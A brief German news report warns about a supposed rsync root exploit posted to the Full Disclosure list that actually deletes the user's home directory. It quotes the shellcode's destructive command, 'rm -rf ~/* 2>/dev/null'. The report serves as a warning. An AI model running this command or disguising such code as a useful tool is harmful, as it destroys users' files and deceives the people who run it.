Angeblicher rsync-Exploit löscht Dateien
Derzeit kursiert ein angeblicher rsync-Exploit, der beim Start alle Dateien im Home-Verzeichnis des Anwenders löscht.
Derzeit kursiert ein angeblicher rsync-Exploit, der nach dem Start alle Dateien im Home-Verzeichnis des Anwenders löscht. Auf der Sicherheits-Mailingliste "Full Disclosure" berichtete ein Teilnehmer, er habe eine Mail mit "seltsamem Code" bekommen, den er für einen noch nicht veröffentlichten rsync-Exploit halte. Der Kommentar des Programms "rsync-too-open" behauptete, dass dieses eine Schwachstelle in rsync unter Linux ausnutze und Root-Zugang übers Netz verschaffe.
Kurz darauf erschienen jedoch erste Warnungen, dass das angehängte Programm statt dessen alle Dateien im Home-Verzeichnis des Anwenders lösche. Der in Maschinensprache verfasste sogenannte Shellcode, der den Zugang zum angegriffenen System vermitteln soll, enthält den Befehl:
rm -rf ~/* 2>/dev/null
(ju)
- Disassemblierter Shellcode auf Full Disclosure
